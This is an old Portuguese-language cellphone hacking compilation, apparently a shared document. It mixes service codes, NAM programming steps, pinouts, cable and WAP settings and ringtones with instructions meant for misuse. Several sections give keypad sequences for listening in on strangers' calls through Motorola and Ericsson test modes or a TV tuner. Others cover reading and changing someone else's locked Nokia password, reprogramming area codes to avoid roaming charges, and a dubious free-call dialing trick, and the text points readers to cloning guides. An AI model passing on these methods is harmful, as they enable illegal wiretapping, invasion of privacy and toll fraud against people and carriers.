Código Celulares by Fernandes20

VIEWS: 57,144 PAGES: 145

									Celulares



-Como funciona o celular

Falando de maneira simples, um celular e' um radio-transmissor que
trabalha com freqüências na faixa de 800 MHz, e que e' capaz de
alternar entre canais ao receber comandos de um computador
conhecido como Central Switch, que controla o sistema telefônico
móvel. Pode-se dizer que um aparelho celular e' dividido em duas
partes: O Transceiver transmissor/Receptor) e a cabeça de comando.
Entende-se por cabeça de comando o teclado e seu circuitos de
comandos, a NAM e a ESN. A NAM e' um chip de E PROM
(Programable Read Only Memory) que contem informações sobre o
funcionamento do celular, como numero, área, etc. Já a ESN
(Eletronic Serial Number) e' um chip de ROM (Read Only Memory) que
armazena um numero geralmente de 11 dígitos octais, referentes a um
numero de serie único para cada telefone. Existem alguns modelos de
celulares que tem as suas NAM's reprogramaveis pelo próprio teclado
do celular. Outros necessitam que se ligue o celular a computadores.
O canal ficará aberto mas se não estiver ninguém lá não escutara
nada!

-Como escutar conversas de telefone pelo celular Motorola (todos os
modelos menos no Elite)

O sistema de telefonia celular é altamente vulnerável ao phreaking. É
simples se fazer escutas telefônicas, e outras coisas como: clonagem
de telefones para se efetuar ligações gratuitas, etc.
1. Tire a bateria e localize os pinos de contatos, eles são 3, os dois da
extremidade são os pólos negativo e positivo do telefone e o do meio é
que o de "Test mode".
2. Arrumar um pedacinho de papel alumínio, e colocar entre o pino
central da bateria e do telefone, depois coloque a bateria
3. Ao ligar o telefone NÃO aparecerá a o contador de sinal, irão
aparecer números piscando. Isso quer dizer que o telefone está
pronto.
4. Atenção para a seqüência de códigos que tem que ser digitado:
# , daí aparece a mensagem " U5' " 08#, daí aparece só um apostrofe
daí é só escolher um código abaixo
110999
111020
111000
111030
111025
depois de cada código digitar #
E pronto

OBS.: Existem mais códigos é que é fácil de achar é só começar com
11 e chutar os 4 próximos números

Tente varias vezes ate encontrar um canal onde haja conversa.
Percebeu? Você esta fazendo uma escuta em um telefone celular.
Não requer pratica nem tão pouco habilidade. Vale lembrar que se
algum policial te pegar você pode ir em cana. Ha também maneiras de
se fazer clonagem, isto e, fazer o seu telefone celular usar a linha de
outra pessoa. Eu particularmente nunca tentei mas, se você quiser por
sua pele a risco, procure pelo Motorola Bible, ou outros tantos textos
existentes por ai.

-Pagar menos na ligações de celulares

Esta dica é muito bacana, esta dica é para celulares, mas tenho uma
ligeira pretensão que em telefones comuns ele chegue a reduzir em
70% a tarifa telefônica ( Só que não é garantido ! ) . Para isso basta
que você pegue o número a ser discado, por exemplo 65-9342 (é um
número que inventei, mas se for o seu me avise hehehe),bem então
você pega o último digito e o subtrai de dez,no caso do exemplo o 2 ,
10 - 2 = 8, então digite o número (65 - 9348)mais o último nº antes de
ser subtraído. Novo número 65 93 48 2 , agora sem pagar.

-Utilizando seu aparelho de televisão:


Este texto contém informações consideráveis que ensinam como fazer
escuta celular via TV(pode se necessário usar o manual da TV).
TV VHF canais 70 - 83 pegue a melhor distribuição do melhor tronco
usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar
preparado para fazer a escuta. Cada canal da TV obrigara 5Mhz com
ótimo controle de sintonia. Se mesmo assim você não tiver uma
freqüência exata você precisará ler sobre freqüência e você terá uma
boa idéia de como obter uma exata. Se a sensitividade não estiver boa
mesmo você estando na cidade, ou perto de uma freqüência exata
você pegara alguma coisa.

Descobrindo senhas de celulares nokia e gradiente modelos mais
novos

Primeiro você vê lá o celular do mane com a mensagem "celular
travado"depois você digita este comando *3001#12345# , e depois
você vai lá em security e lá você vê a senha dele...você pode fazer
sacanagem por exemplo mudar a senha dele hehehheh...


Método para habilitar telefone celular marca "MOTOROLA" MOD.
DPC-550 em outras cidades


1- COMO DESCOBRIR O CÓDIGO DO LOCAL ONDE VOCÊ QUER
HABILITAR O
SEU.
a- Utilizar um telefone que esteja habilitado no local desejado.
b- Digitar: FCN + treze zeros + RCL + * = Vai surgir o código do local
(Ex. S.P.=00003).
c- Digitar: RCL + * + SND.


2- COMO HABILITAR O SEU TELEFONE.
a- Agora você vai utilizar o telefone a ser habilitado.
b- Digitar: FNC + treze zeros + RCL + * (Vai aparecer o código da área
onde o
telefone está habilitado)
c- Digitar o código da área desejada(SEM OS ZEROS) + RCL + * +
SND. Seu
telefone estará habilitado se a lusinha verde do canto esquerdo
estiver
piscando.
- Dessa forma toda ligação feita para a localidade que você estiver,
será
considerada ligação local e quando for feita ligações interurbanas, não
será
cobrado as taxas de deslocamento.

Þ ATENÇÃO: DURANTE TODA A OPERAÇÃO, O TELEFONE
DEVERÁ FICAR
ABERTO. TANTO PARA
DESCOBRIR O CÓDIGO DA ÁREA COMO PARA HABILITAR. CASO
CONTRÁRIO,CORRE-SE O RISCO
DE DESABILITAR O TELEFONE EM DEFINITIVO.

OBS.
ESTE MÉTODO SERVE PARA TODOS OS MODELOS
MOTOROLA, MENOS PARA O MODELO 650.

RELAÇÃO DE CÓDIGOS JÁ CONHECIDOS:

Curitiba - 1
São Paulo - 3
Brasília - 131
Goiânia - 1313
Anápolis - 1313
Salvador -387
Vit. Conquista - 395
Itabuna - 391
Ilhéus - 391
Porto Seguro - 391
Prado - 391
Teixeira - 391
Maceió - 1393
Belo Horizonte - 193
Governador Valadares - 215


Mais uma sobre escuta telefônica


Motorola Star Tac: . Isso vai fazer com que você pegue a conversa da
pessoa que estiver mais próxima do seu celular. Para fazer a escuta
você tem que fazer como está aqui:
Fcn 00 ** 83786633 sto#56##08#. Para sair da escuta aperte 01#.

Ericson: Isso serve para qualquer modelo. Pressione a tecla Fnc e
aperte os números 90,40 e 59. Você vai ouvir um som diferente aí
aperte 1*1#01## e pronto, agora é só scanear os canais com a tecla
de volume e, é só ficar apertando até você escutar alguém na linha.

Mais códigos

Nokia 6120 / Gradiente Strike
Mudar o texto "Sist. de Origem" (ou o nome da sua operadora):

- Digite: *3001#12345#
- Selecione "NAM1". Utilizando a tecla para "cima", selecione "Alpha
tag"
- Escreva o texto de sua preferência
- Desligue e ligue o telefone
Verificar a data de fabricação e a versão do software instalado:
- Digite *#92772689# (*#warranty#)
- Tela 1: Aparece o Número Eletrônico Serial (Serial Number)
- Tela 2: Aparece a data de fabricação (Made).
- Tela 3: Aparece a data da programação (Programming date)
- Tela 4: Aparece o número de reparos (Repaired)
- Tela 5: Transfere os dados do usuário (Transfer user data?)
- Tela 6: Contador geral (Life timer)

Programar o número do telefone:

- Digite *#639#
- Entre com o (novo) número do telefone
Verificar a versão de "firmware" do telefone:
- Didite *#9999#


Motorola Micro-TAC ELITE


Entrar em "Teste Mode":
- FCN
- 0000000000000 (13 vezes o No. 0)
- STO
- Para "navegar" pelas opções, utilize a tecla * (seta para a esquerda)

Pinagem (numerados da esquerda para a direita):

1) Audio Ground (terra do áudio)
2) Ext b+ (fonte externa)
3) T Data
4) C Data
5) R Data
6) Logic Ground (terra)
7) Audio Out - on/off (seletor de saída de áudio)
8) Audio In (entrada de áudio)
9) Manual Test
10) Battery Feedback (condição da bateria)



Motorola Star TAC

Verificar o "IMEI" do telefone:

- Digite: * # 06 #

Pinagem:


1) Connected with 22pf to pin 3
2) RF out (saída p/ antena)
3) Connected with 33 pf to pin 8, 33 pf to pin, 33 pf to pin 7
4) BAT_FDBAK (condição da bateria)
5) MAN_TEST connected with 10k to L275
6) RS232_TX - connected to MCU SPI bus
7) RS232_RX - connected to MCU SPI bus
8) AUDIO_IN (entrada de áudio)
9) AUDIO_OUT (saída de áudio)
10) Connected with 33 pf to pin 13, 33 pf to pin 14
11) UPLINK -|
12) DOWNLINK -|- DSC bus connected to the BIC
13) DSC_EN_B -|
14) EXT_B+ (entrada de alimentação)
15) Gnd (terra)

Motorola Micro-TAC (PT-550, PT-900, Ultra-Lite, DPC-650, Lite II,
ELITE)

Escuta de outros telefones:
- Digite: FCN 0 0 * * 8 3 7 8 6 6 3 3 STO # 1 1 9 9 1 # 0 8 #


Test Mode:
FCN 0000000000000 RCL *
01 (CÓDIGO ÁREA UF- 739 ACRE)
02 DDD
03 NUMERO TELEFONE
04 14 (PADRÃO)
05 04 (PADRÃO)
06 14 (PADRÃO)
07 0000000 (COD SEG.)
08 123 (COD. BLOQ.)
09 010100
11 11101
FCN 00** 83786633 STO # 55 #

* (para próximo numero)

1 739 (CÓDIGO DA ÁREA ESTADO)
2 1010 1100 (PROGRAMAÇÃO BINÁRIA)
3 DDD + NUMERO TELEFONE
4 14
5 04
6 14
7 000 000 (CÓDIGO SEGURANÇA)

8 123
9 004
10 0100 0100
11 0000 0000
12 0333
13 0333
14 0334
15 021
16 1010 1011


Gradiente CP 30 / CP 40


Colocar Um Novo Número


*3001#12345 STO 00

STO
CLR
190#193#0*1234 STO 01
STO
CLR
DDD + N.ºTELEFONE STO 02
STO
CLR
581*1*1*333*0+ÚLTIMO NÚMERO DO TELEFONE*14 STO 03
STO
CLS
PWR

ERICSSON 318/368/388/618/688

Step:

1)press 923885, press MENUE key
2)select NAM 1 (push 1)
3)ESN displayed (Press RCL)
4)enter cellur phone number 000-0000, press RCL
5)A-key shows # (press RCL)
6)SID 1 (enter sys id) press RCL
7)ALPHA TAG 1 (leave as is) Press RCL
8)LOCK code 0000, press RCL
9)GO to level 2, press NO
10)EXIT (save)(Press YES)
11)Press MENUE
12)Press 3
13)Press 2



Como você viu existem varias formas de escutas telefônicas não sei
se todas funcionam no mesmo telefone mas de qualquer forma vale
tentar qualquer duvida mande me um e-mail




Codigos



O uso destes codigos e por sua conta e risco.

Codigos Para celulares Nokia a Maioria.

todos Servirão para o meu 3320. Bom aproveito

*#7780# Restaura a configuração original do celular
*#3872# Aumenta a freqüência analógica do seu celular
*#837# ou *#VER# Telefone Versão (não funciona em todos modelos)
*#9999# ou *#6120# ou *#00003 Versão de Software (não trabalha em
todos modelos)
*#92772689# ou *#WARRANTY# ESN: Há 6 sub-menus incluindo: 1.
Número Serial; 2. Fabrique data; 3. Programando Data; 4. Repare
Data; 5. Transfera dados do usuário; e 6. Timer De Vida. (Força
desligado para libertar-se este menu)
*3001#12345# Seleção do NAM e campo testa modo: Uma Vez modo
de programação interior rola ao fundo do menu lista e um ou outro
selecionado Habilitado ou Enabled+lights. Desligue o telefone e vira
isto ajuda em outra vez para ver as telas de modo de teste. Para
desligar testa modo repete o acima e seleciona Desabilitado e então
desliga o telefone. *3001#12345# Mudando a Bandeira: Entre o modo
de seleção do NAM por entrar Então seleciona no seguinte pedido:
NAM1, PSID/RSID listas, P/RSID 1, Tipo De Sistema=Particular,
PSID/RSID=0 ou 1, Conectado ID DE Sistema=[Seu Rogers SID DE
área de casa: 16423 ao Toronto, 16425 ao Vancouver, 16427 ao
Victoria, etc. Pergunte seu Rogers local armazena se você é incerto
que seu SID local está], Etiqueta De Alfa=[Sua Nova Bandeira],
Código Do Operador=5 ou 2050 [ao Rogers], e Código Do Interior=302
[ao Canadá] =310 [ao USA]. Uma Vez força completa abaixo o
telefone e então volta isto ajuda em.
Note que há também uma Etiqueta De Alfa sob a NAM1 opção de
menu e você pode mudar este para uma nova bandeira, mas esta
bandeira não aparece no telefone (aplica para 6160, 6161). Nota: mais
novo Rogers AT&T telefones têm a bandeira queimada dentro o ROM
e não há caminho fácil de mudar isto.
Trocando identidades: NAM1 > Muda default (8) > Sistema Público
(14) > Sistema Particular (15) > Sistema Residencial (16) > Senha
123456. Note que este procedimento parece para unicamente trabalha
sobre 10 tempos antes isto fecha você fora.
*#639# ou *#new# Ativação: Uma Vez interior este menu você deve
entrar um 10 dígito telefona número que é válido com o ESN do
telefone ou a ativação falhará (previne cloning). O código código do
SID DO sistema (vê mudando a bandeira acima por um SID pouco). O
telefone vai então reatribue.
*#6392# Ativa o 2º número do celular
*#7370# Apaga todos os dados do celular, deixa-o como se fosse
novo
*#92702689# Novo menu (ainda não sei a função)
*#92772689# Mostra no. de série e outras funções
**04*PINATUAL*PINNOVO*PINNOVO# serve para trocar o pin (todos
celulares gsm) *7766# ativa menu pre-pago (apenas 3320/fredom)
*#77633# desativa menu pre-pago (apenas 3320/fredom)
*#92702689# Opção para transferência de dados (apenas
3320/fredom)
*#7370# zerar todo o celular
#(PRECIONADA POR 5 SEG) Mostra tempo total de uso
*#557#8795*SEND* Deleta a abertura do calular (não tem volta)
#0#* E TECLE send 2X configura nam 1 e verifica serial
*#7373# Linpa todo celular

Links Relacionados:

http://www.mobile.box.sk/

NOKIA

-2160
-5120
-5165
-5180
-6120
 Pinagem do 6120:

 Olhando a base do 6120, com o conector do carregador para a
esquerda
 (display para cima):

I(O)I   IIIIIII
(carreg) 1 2 3 4 5 6 7

 1 - MIC (audio in + comandos de accesorio)
 3 - EAR (audio out + DC p/ alimentar headset)
 4 - M2BUS (comunicação de dados)
 7 - GND
 O pino M2BUS e usado para comunicação bidirecional, e os níveis
são
 baixos (em torno de 3V) . Um conversor de nível para RS232, como
MAX232,
 ou transistores, tem que ser usado.
 Tensão baixa = 1, Tensão alta = 0.
 Configure o PC para 9600, 8, Odd (paridade impar), 1
Para ver pinagem do 2160, veja
http://www.dreilaendereck.com/philipp/nokia/pinouts.htm

-6120i
 Edição de NAM/Segurança: *#3001#12345#
 Serial/Transfer Data: *#92772689#
 Versão: *#9999#
 Reset: *#7370# (Use por conta própria!)

-6180
-8260
-8860
-7160

*Cabos disponíveis para Nokias & Gradientes:
 -DAU-9P
 -DLR-3P

->Descriçao dos numeros finais dos Tels. Nokia:

XX20 -> AMPS / TDMA 900Mhz (dual band)
XX60 -> AMPS / TDMA 900Mhz/1800Mhz (dual band e tri-mode)
XX80 -> AMPS / CDMA 900Mhz (dual band)

XX10\
XX30 | São todos GSM, sei que os 1800Mhz são os europeus
XX50 | e asiáticos, o que me leva a crer que os XX90 sejam os 1900
XX90/ (USA only)


---------
Gradiente

-Strike
-Concept
-Neo
-GoWap

---------
Motorola
-PT Series
 650
 900
 Lite
 Ultra Lite
 Elite

Mudar o nome da saudação de entrada no ST7790 - V2390 .
Pode ser tentado em outros Motorola TDMA.

Digite:

#7764726# SND
1
edit 1 nam
*
Entre com o código de segurança:
000000
Tela=ESN
Use # até alfa
Escreve o desejado.
Procurar com as setas.
P/nivel 3 (botão inteligente)
Sid Alfa Tag Ctl= lig (botão inteligente)
# até p/ nivel 1
botão inteligente
Procurar com as setas p/ nível 4

PPMsg: Digita a mensagem que aparece quando é ligado o telefone.
STO ou Botão inteligente.
# até aparecer p/ nivel 1
botao inteligente
seta de volume p/ cima até aparecer sair
botão inteligente
Salva info?
* para salvar
o telefone reinicia com as alterações.
-StarTac
 -6000
 -8000
 -9000
 -Talk-About
 -7680W
 -7760
  ->Se o que você quiser alterar o banner, lá vai:
  FCN 1, * , STO, #, #, #, # , STO, # até aparecer "Mudar Mensagem"
STO,
  Utilize a CLR para apagar a mensagem. Se quiser, digite a nova
mensagem.
  Aperte STO no final e END para sair do menu

 ->escuta de conversas (???)
 END FNC 00**83786633 STO 11991#08#11888# - PARA ENTRAR
 01# - PARA SAIR

-3160
-2260
-8160(vulcan)


---------
Samsung

-Voicer
-Voicer Slim
-voicer Fashion
-Compact

Samsung SCH-411, Samsung SCH-620, Samsung SCH-811

-codes-
 47*869#08#9
 NAM Programming

*759#813580 Test Mode (commands)

-secrets-
[Menu]8 PASSWORD:0415
Debug Menu

[Menu]40 PASSWORD:626
 Brief NAM Programing
(not all versions)

[Menu]45             [menu]47 (sch620 or sch811)
 LCD Contrast
(not all versions)

[Menu]49          [sch620 or sch811 or consulte a mim]
 SIO Mode
HandsFree / DM(Diagnostic Mode)(Writer ESN)

[Menu]0 PASSWORD:####
 External Audio

[Menu]0 PASSWORD:25## A-Key (?)


[Menu]0 PASSWORD:0000 MENU A2

Samsung CDMA Test Mode

Test Mode Codes

these commands has been tested on sch411 ver(s:41h01 sf17 /
h:41f.16
q)

they might or might not work on your phone

plz tell me if they work, if you know what they do, and your phone
ver

.01 - Suspend
.02 - Reboot
.04 - CDMA Mode
.07 - Carrier On
.08 - Carrier Off
.09 - Chan____????
.10 - Pwr level__?
.11 - Rx Mute
.12 - Rx UnMute
.13 - Tx Mute
.14 - Tx UnMute
.15 - ESEC OnOff ?
.16 - ST On
.17 - ST Off
.18 - LCD Contrast. 00-31 def=16 (LCD_CONT: ??)
.19 - Index DECR
.20 - LNA GAIN
.22 - Send NAM
.23 - Send S/W Version
.24 - Send ESN
.25 - Backlight On
.26 - Backlight Off
.27 - Lamp On (LED)
.28 - Lamp Off
.30 - Product Info
.32 - SATon_____?
.33 - SAT off
.34 - CDATA
.38 - VOC E_OFF???
.39 - VOC P_OFF???
.40 - VOC Rx_G????
.41 - VOC HF_UP???
.42 - DTMF On____?
.43 - DTMF Off
.44 - Compand On
.45 - Compand Off
.46 - Voice State
.47 - AUD lvl__???
.48 - Vibrator On
.49 - Vibrator Off
.50 - Btype=???(?)
.51 - BBASIC____?
.52 - H/W:???.??
.53 - Banner?:???
.54 - Cellular Bandwidth (8k[0]13k[1]?)
.55 - External Audio
.56 - Loopback On
.57 - Mic UnMute
.58 - Mic Mute
.59 - UnMute All
.60 - Tx Gain__???
.61 - Rx Gain__???
.62 - DTMFvol_???
.63 - TxLimit__???
.64 - SAT lvl__???
.65 - FreqGain_???
.66 - ST lvl___028
.67 - RD BattVal
.68 - StbyBatt_???
.69 - TalkBatt_???
.70 - WR Batt__???
.71 - CD TXagc_???
.72 - FM TXagc_???
.73 - ON PA_R0
.74 - Off PA_R0
.75 - Input Level (RD Rssi__???)
.77 - RD TEMP_???
.78 - WrRXRAS__??
.79 - BuzzerOn_?
.80 - BuzzerOff
.81 - PCM loopOn
.82 - PCM loopOff
.85 - Speaker On
.86 - Speaker Off
.87 - FM_LOOP_BACK
.88 - TRC adj_???
.89 - Freq Fine Tunning (CdTk adj_???)
.92 - TXRAS[??]???
.93 - RXRAS:???
.94 - HW ChanFlat:????
.95 - SW ChanFlat:????
.96 - ChNo[??]_???
.97 - Txpwr[??]???
.99 - TEMP[??]????
---------
LG

-LGC-330W Dual Mode CDMA Phone
 (170-1444)         NAM Programming            Faxback Doc. #
58566
 Programming Instruction Guide (All steps must be completed)
 Preparation:
 Step: Action:

1     Press MENU 4,0 to access Programming Menu.
2     Enter Service Programming Code (default 000000)
3     Press 1 for NAM Programming (Prog. Mode)
4     Press 1 for NAM 1
5     Press 2 for NAM 2

Programming Steps:

Step: Item:          Default:   Action:

 1 ESN              201 xxxxxxxx Enter [OK] (Display Only)
 2 NAM 1 Phone Number 000-000-0000 Enter NAM 1 Phone
Number
(OK)
 3 NAM 1 Home SID            0    Enter Home System I.D. (OK)
 4 NAM 1 Name             NAM 1     Enter NAM 1 Name (OK)
 5 Basic NAM 1 Program (Exit)(More) Enter (Exit) to complete
Short
   is Complete               Programming, Enter (More)
to
                        Advance to Extended
Programming
 6 Phone Model            7     Enter (OK) (Display Only)
 7 Warranty           Date Code Enter (OK) (Display Only)
 8 Service Program Code 00000 Enter Service Sec. Code
(OK)
 9 Slot Cycle Index       2     Enter Slot Cycle Index (OK)
10 NAM 1 CDMA Phone No. 000-000-0000 Enter CDMA Phone
Number
(OK)
11 NAM 1 AMPS Phone NO. 000-000-0000 Enter AMPS Phone
Number
(OK)
12 NAM 1 Mobile
    Directory #  000-000-0000 Enter Mobile Directory #
(OK)
13 NAM 1 Mobile Country
    Code          310    Enter Mobile Country Code
(OK)
14 NAM 1 Mobile Network
    Code           00    Enter Mobile Network Code
(OK)
15 NAM 1 CDMA Home SID 1 0          Enter CDMA Home Sys. ID
#1(OK)
16 NAM 1 CDMA Home NID 1 65535 Enter CDMA Network ID #1
(OK)
17 NAM 1 CDMA Home SID 2 0          Enter CDMA Home Sys. ID
#2
(OK)
18 NAM 1 CDMA Home NID 2 65535 Enter CDMA Network ID #2
(OK)
19 NAM 1 CDMA Home SID 3 0          Enter CDMA Home Sys. ID
#3
(OK)
20 NAM 1 CDMA Home NID 3 65535 Enter CDMA Network ID #3
(OK)
21 NAM 1 CDMA Home SID 4 0          Enter CDMA Home Sys. ID
#4
(OK)
22 NAM 1 CDMA Home NID 4 65535 Enter CDMA Network ID #4
(OK)
23 NAM 1 AMPS Home SID        0     Enter AMPS System (OK)
24 NAM 1 Lock-Out Sys. 1 0      Enter Lock-Out SID
(OK)(into 5

entries)
    Exit Phone Programming     Programming Complete

-DM 110
-DM 510 (Imotion Duo)
---------
Qualcom

-Q-Phone
atalhos
MENU+40 e MENU+80
Senha ->000000

---------
Ericsson

-KF788
código de programação:
923885 e seta para baixo.

código de reset do celular:
904060 e seta para baixo.

codigo pra entrar no modo teste:
904059 e seta pra baixo.

-A1228d

Escuta:
1º Você tem q ter uma idéia em que canal trabalha a operadora.
Faça isso assim: Entra no menu de NAM (923885+MENU),
pressione 1, vai subindo até encontrar o level 2, entre nesse level,
e
procure por "Init Page Chn",
vai ver um n.º, (no meu é 0333). Tem tb o 2ndPage Chn, pegue esse
n.º
também.

2º Entre no menu de teste: digite 904059+MENU, YES. digite 1, "p/
cima
",YES,
2, "p/ cima", YES,
digite 86, YES. Pronto esta em modo de teste.
3º Ajuste o canal: para trocar de canal digite 39+CLR+00+xxxx. O
"xxxx" é o
canal. Ele varia de 1 até
+ ou - 1020. No meu caso, o canal 333 da minha operadora é
codificado.
Então fui trocando os canais, até q achei o da operadora paraguaia
(Chn
0300).

Se estiver procurando um canal, entre nele e espere alguns instantes,
porque
ele
fica chiando e de repente
fica mudo e você começa a ouvir uma conversa!

-T18d
-DH668
 ->Escuta:
  digite 904059 e pressione menu


----------
Philips

-Aeon


----------



----------



----------



----------
Wintesla:

-> caso dê pau na autenticação do usuário -> Abra o arquivo
OP_ID.VAL
no
diretório x:/WINTESLA/VALIDATE
e verifique os operadores estão cadastrados.
->No menu software o item short code memory você pode gravar sua
agenda(backUp) e salvar ate como txt, indexando por nome ou por
tel.,
mas ocorrem erros em acentos
-> Para alterar o alpha tag vá em Dealer -> Intelligent Roamig
Database...
em baixo tem Home alphatag
-> Para o envio de SMS vá em Software -> Product Profile e na opção
'Write
Text Messages', mude para 'On'

-> Para o Wintesla funcionar com o Nokia 5120
Abra o arquivo 'TESLA.INI' que está no diretório Wintesla e localize
a
seguinte chamada:

[NSW-3]
System=1
UserInterface=NSW3
Functionality=NSW3

Após esta entrada, acrescente:

[NSC-1]
System=1
UserInterface=NSW3
Functionality=NSW3

Tabela de Modelos Nokia e respectivos módulos para Wintesla (Falta
o
7160!!)

Nokia model numbers
===================
Nokia 1611 (nhe-5)
Nokia 2110i(nhe-4)
Nokia 2148i(nhk-4)
Nokia 8110i(nhe-6)
Nokia 3110 (nhe-8)
Nokia 3210 (nse-8)
Nokia 3810 (nhe-9)
Nokia 5110 (nse-1)
Nokia 5130 (nsk-1)
Nokia 5190 (nsb-1)
Nokia 6110 (nse-3)
Nokia 6120 (nsc-3)
Nokia 6130 (nsk-3)
Nokia 6150 (nsm-1)
Nokia 616x (nsw-3)
Nokia 6185 (nsd-3)
Nokia 6190 (nsb-3)
Nokia 7110 (nse-5)
Nokia 7160 (nsw-5)
Nokia 8810 (nse-6)
Nokia 9000i(rae-4)
Nokia 9110 (rae-2)
Nokia 550 (thf-10)
Nokia 540 (thf-11)
Nokia 650 (thf-12)
Nokia 640 (thf-13)

h = protocol version 1 (like fbus-3810)
s = protocol version 2 (like fbus-6110)
a = communicator protocol

e = GSM 900 (newer models also have dual-band, like 3210 or 7110)
k = GSM 1800
m = GSM 900/1800 (dual-band for older phones, like 6150)
b = GSM 1900
c=
w=
d=
1 = 51xx phones
2 = 91xx phones
3 = 61xx phones
4 = 21xx and 90xx phones
5 = 16xx and 71xx phones
6 = 81xx and 88xx phones
7=
8 = 31xx and 32xx phones
9 = 38xx phones


----------
Toques(Ringtones) para envio em SMS:

Aqua

//SCKL1581
024A3A5105C5D58404003698E32C2AC32C512624D20820BB0A30B
B0E30CA0BB0AB082
0AB0930
BA0920820BB0AB0CA0BA0000

CocaCola

//SCKL1581
024A3A610DBD8D850DBDB18404001EA8E2EC2EC2EC2EC3082EC
2A82AC34C2E8268490
20000

Discovery

//SCKL1581
024A3A6511A5CD8DBDD995C9E4040014923031051181681561162
4C24000

StarTrek

//SCKL1581
024A3A614DD185C951C995AC04001C9882CD370514493624DC4C
45446259290000

IndianaJones

//SCKL1581
024A3A7125B991A585B98529BDB995CC04008E9942A820C2CC30
C20C5112A48349A08
30AB0B0
0824C20830D30E30831458A920834820C38C511213215224AA0830
B30C30831444041
04D0418
558580930820C30C515490613424830C3145524184D0920C30C516
490615410613611
02400

----------



----------



======================================================
===============
====
Cabos:

------------------
CABO MODELO DAU-9P
------------------

Este cabo pode ser utilizado com os modelos Nokia 5120, 5120i, 5180,
6120,
6120i, 6180, Gradiente Strike, Strike Info, Concept, Concept Exec. O
cabo é
conectado a uma porta serial livre de seu micro (9 pinos).
Ele também é compatível com aparelhos GSM das séries 6100 e 5100
da
Nokia,
que estarão disponíveis no país com as Banda C, D e E.

Com o cabo DAU-9P, você pode utilizar os seguintes softwares:

- FusionPhone - http://www.fusionone.com/ - Sincronização da Agenda
e
compromissos, backups dos dados do celular (para todos os modelos
de
celular
acima).

- FoneSync - http://www.fonesync.com/ - Sincronização da Agenda,
backups dos
dados do celular (para todos os modelos de celular acima).

- Wintesla - http://www.nokiawintesla.hpg.com.br/ (**) - Software de
manutenção da Nokia - Desbloqueio de operadora (*), do Alpha Tag,
troca da
tela inicial do aparelho, habilitar envio de mensagens (*). O
Wintesla só
pode ser utilizado, no momento, com a maioria dos aparelhos TDMA.
Até
o
momento não há como utilizar o Wintesla com os aparelhos CDMA.

- Logomanager - http://www.nokiawintesla.hpg.com.br/ - Troca do
gráfico
inicial nos modelos Nokia 6120 e Gradiente Concept e mudança de
toques e
gráfico inicial no modelo 7160.


------------------
CABO MODELO DLR-3P
------------------
Este cabo pode ser utilizado com os modelos Nokia 6120i, 6180 e
7160,
Gradiente Concept Info Series, Concept Web, G-WAP e c/ a série
71XX
também!!!
Não temos o doongle, mas funciona!! O cabo é conectado a uma
porta serial livre de seu micro (9 pinos).

Ele também é compatível com aparelhos GSM Nokia 7110 e 6210 da
Nokia,
que
estarão disponíveis no país com as Banda C, D e E.

Com o cabo DLR-3P você pode acessar um provedor de Internet,
servidor
remoto, micro equipado com modem ou enviar faxes através de
qualquer
um dos
modelos de celular acima, sem precisar de modem. A operadora deve
oferecer o
serviço de transmissão de dados.

Nos modelos Nokia 7160 e Gradiente G-WAP, também é possível
utilizar
o
Phonesync e o Logomanager.

NÃO É POSSÍVEL USAR O WINTESLA COM ESTE CABO.

======================================================
===============
======
Configuração para WAP:

-ATL->homepage: http://wap.atl.net.br/
   Tipo de sessão: Conexão Temporária
   Segurança de Conexão: Desativada
   Número de discagem: *600
   Endereço IP: 200.190.167.120
   Tipo de autenticação: segura
   Nome do usuário: wap@atl
   Senha: atlexpress

-BCP-SP->Homepage -> http://www.bcponlinewap.com.br/
   Tipo de sessão -> Temporária
   Segurança da conexão -> Desativada
   Número de discagem -> *600
   Endereço IP -> 200.211.188.220
   Tipo de autenticação -> Normal
   Nome do Usuário -> BCP
   Senha -> BCP

   Gateway -> 1191010246

-Tess->Configuração dos 3 modelos de aparelhos (Se a programação
 estiver errada)
 o Selecionar Menu
 o Com o roller, selecionar opção Serviços
 o Selecionar Configurações
 o Selecionar Configurações da conexão
 o Selecionar WAPTess
 o Selecionar Editar

Homepage
o Digitar http://wap.tess.com.br/

Tipo de sessão
o Selecionar conexão temporária

Segurança da conexão
o Selecionar Desativada

Número de discagem
o Digitar *600

Endereço IP
o Digitar 200.245.6.202

Tipo de Autenticação
o Selecionar Normal
Nome do usuário
o Digitar tess@tess.net.br

Senha
o Digitar tess (a senha é igual para todos os aparelhos)

cabe lembrar que esta programação é válida apenas para os
aparelhos
compatíveis com a tecnologia WAP.




----------

Se mais alguém tiver algo para acrescentar, manda para galera que
eu vou guardando tudo numa mensagem só.
E vou postando.. de tempo em tempo...

----------
Cálculo de custo por minuto de uso do seu celular:

A equação para saber se vale ou não a pena ter o pós-pago ou o
pré-pago é simples:

VA + M x VMpós = M x VMpré

Sendo:

VA -> Valor da assinatura
M -> Quantidade de minutos
VMpós -> Valor do minuto no pós-pago
VMpré -> Valor do minuto no pré-pago

O VA, o VMpós e o VMpré vc pega na página da operadora (utilize um
valor considerando o horário do seu uso, por exemplo, considere q vc
use 70% na tarifa cheia e 30% com desconto, para chegar ao valor
médio
dos minutos). Você achará o valor M refente a quantidade dos minutos
em que o sistema Pós-Pago terá o mesmo custo que o Pré-Pago, se
vc
usar acima disto, vá para o Pós, abaixo disto Pré.



########################################################
#############
##
Links

Informações e análises de telefones -> http://www.seucelular.com/
Wintesla:
     -> http://www.nokiawintesla.hpg.com.br/
     -> http://www.geocities.com/nokiawintesla/
     -> http://www.nokiawintesla.hpg.br/
TIM-SMS -> http://tcs.timnet.com.br/
Tess-SMS -> http://www.ondefor.com.br/
BCP-SMS -> http://www.bcp.com.br/digimemo
TCO e-expresso -> http://www.tco.com.br/
Toques(ringtones) p/

-
>http://www.2thumbswap.com/members/tones/nokia/tones_nokia_title_
i.h
tml
      -> http://www.the-mobile.net/
      -> http://www.montrealsoft.com/Nokia/
Sites de Ringtones e Logos:
 -> http://www.yourmobile.com/
      -> http://www.cellular.co.za/logos.htm
 -> http://www.logopalace.com/

Telesp Celular-> http://www.telespcelular.com.br/
Telefonica Celular-> http://www.telefonicacelular.com.br/
BCP-> http://www.bcp.com.br/
Tess-> http://www.tess.com.br/
TIM -> http://www.timnet.com.br/net/
Maxitel -> http://www.maxitel.com.br/
Inf. Gerais -> http://www.mobile.box.sk/
FoneSync -> http://www.fonesync.com/
Cartões por WAP-> http://www.e-wap.com.br/
Cabos para GSM-> http://www.gsmcables.co.uk/
Nokia-> http://www.nokia.com.br/

